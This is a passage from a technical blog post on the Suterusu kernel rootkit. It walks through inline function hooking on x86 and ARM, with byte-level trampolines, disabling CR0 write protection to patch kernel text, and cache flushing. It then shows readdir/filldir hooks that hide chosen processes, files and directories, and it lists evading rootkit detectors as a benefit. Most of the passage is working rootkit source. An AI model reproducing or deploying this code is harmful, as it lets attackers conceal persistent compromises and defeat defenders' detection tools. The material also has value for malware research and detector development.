Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];
    unsigned long o_cr0;

    // push $addr; ret
    memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);
    *(unsigned long *)&n_code[1] = (unsigned long)new;

    memcpy(o_code, target, HIJACK_SIZE);

    o_cr0 = disable_wp();
    memcpy(target, n_code, HIJACK_SIZE);
    restore_wp(o_cr0);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

A small-sized shellcode buffer is initialized with a “push dword 0; ret” sequence, of which the pushed value is patched with the pointer of the hook-with function.  HIJACK_SIZE number of bytes (equivalent to the size of the shellcode) are copied from the target function and the prologue is then overwritten with the patched shellcode.  At this point, all function calls to the target function will redirect to our hook-with function.

The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation.  The remaining hijack functions operate on this linked list.

hijack_pause() uninstalls the desired hook temporarily:

void hijack_pause ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_resume() reinstalls the hook:

void hijack_resume ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->n_code, HIJACK_SIZE);
            restore_wp(o_cr0);
        }
}

hijack_stop() uninstalls the hook and deletes it from the linked list:

void hijack_stop ( void *target )
{
    struct sym_hook *sa;

    list_for_each_entry ( sa, &hooked_syms, list )
        if ( target == sa->addr )
        {
            unsigned long o_cr0 = disable_wp();
            memcpy(target, sa->o_code, HIJACK_SIZE);
            restore_wp(o_cr0);

            list_del(&sa->list);
            kfree(sa);
            break;
        }
}

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops.  This protection may be trivially circumvented however by setting the WP bit in the cr0 register to 0, disabling write protection on the CPU. Wikipedia’s article on control registers confirms this property:

BIT NAME FULL NAME DESCRIPTION
16 WP Write protect Determines whether the CPU can write to pages marked read-only

The WP bit will need to be set and reset at multiple points in the code, so it makes programmatic sense to abstract the operations.  The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

inline unsigned long disable_wp ( void )
{
    unsigned long cr0;

    preempt_disable();
    barrier();

    cr0 = read_cr0();
    write_cr0(cr0 & ~X86_CR0_WP);
    return cr0;
}

inline void restore_wp ( unsigned long cr0 )
{
    write_cr0(cr0);

    barrier();
    preempt_enable_no_resched();
}

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM.  For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture.  While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development.

Modified to address these new architectural characteristics is a version of hijack_start() specific to ARM:

void hijack_start ( void *target, void *new )
{
    struct sym_hook *sa;
    unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];

    if ( (unsigned long)target % 4 == 0 )
    {
        // ldr pc, [pc, #0]; .long addr; .long addr
        memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[4] = (unsigned long)new;
        *(unsigned long *)&n_code[8] = (unsigned long)new;
    }
    else // Thumb
    {
        // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr
        memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE);
        *(unsigned long *)&n_code[8] = (unsigned long)new;
        target--;
    }

    memcpy(o_code, target, HIJACK_SIZE);

    memcpy(target, n_code, HIJACK_SIZE);
    cacheflush(target, HIJACK_SIZE);

    sa = kmalloc(sizeof(*sa), GFP_KERNEL);
    if ( ! sa )
        return;

    sa->addr = target;
    memcpy(sa->o_code, o_code, HIJACK_SIZE);
    memcpy(sa->n_code, n_code, HIJACK_SIZE);

    list_add(&sa->list, &hooked_syms);
}

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forego any potential voodoo magic to write to protected memory regions.  It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook.

ARM CPUs utilize a data cache and instruction cache for performance benefits.  However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory.  According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code.  The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

void cacheflush ( void *begin, unsigned long size )
{
    flush_icache_range((unsigned long)begin, (unsigned long)begin + size);
}

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors.  It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages.  A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal/no modification.  While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe.  By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called.  Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine.  However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion.  Moreso an issue of poor implementation than any insurmountable design flaw, there are various easy solutions to the problem of having your hook-with function accidentally call the hooked function itself, leading to infinite recursion.  Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified.

Hiding Processes, Files, and Directories

Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique.

In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For explicatory purposes, we will examine the instantiation of the file_operations struct on ext3 for directory objects:

const struct file_operations ext3_dir_operations = {
    .llseek     = generic_file_llseek,
    .read       = generic_read_dir,
    .readdir    = ext3_readdir,
    .unlocked_ioctl = ext3_ioctl,
#ifdef CONFIG_COMPAT
    .compat_ioctl   = ext3_compat_ioctl,
#endif
    .fsync      = ext3_sync_file,
    .release    = ext3_release_dir,
};

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output.  To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct:

void *get_vfs_readdir ( const char *path )
{
    void *ret;
    struct file *filep;

    if ( (filep = filp_open(path, O_RDONLY, 0)) == NULL )
        return NULL;

    ret = filep->f_op->readdir;

    filp_close(filep, 0);

    return ret;
}

The actual hook process (for hiding items in /proc) looks like:

#if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30)
proc_readdir = get_vfs_readdir("/proc");
#endif
hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.

To perform the actual hiding of an objects in /proc, Suterusu hooks proc_readdir() with the following routine:

static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type);

int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir )
{
    int ret;

    o_proc_filldir = filldir;

    hijack_pause(proc_readdir);
    ret = proc_readdir(file, dirent, &n_proc_filldir);
    hijack_resume(proc_readdir);

    return ret;
}

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory.  This is replaced with a malicious n_proc_filldir() function, as follows:

static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_proc *hp;
    char *endp;
    long pid;

    pid = simple_strtol(name, &endp, 10);

    list_for_each_entry ( hp, &hidden_procs, list )
        if ( pid == hp->pid )
            return 0;

    return o_proc_filldir(__buf, name, namelen, offset, ino, d_type);
}

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide.  If a match is found, the callback returns 0 and the item is hidden from the directory listing.  Otherwise, the original proc_filldir() function is executed and its value returned.

This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first:

static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
{
    struct hidden_file *hf;

    list_for_each_entry ( hf, &hidden_files, list )
        if ( ! strcmp(name, hf->name) )
            return 0;

    return o_root_filldir(__buf, name, namelen, offset, ino, d_type);
}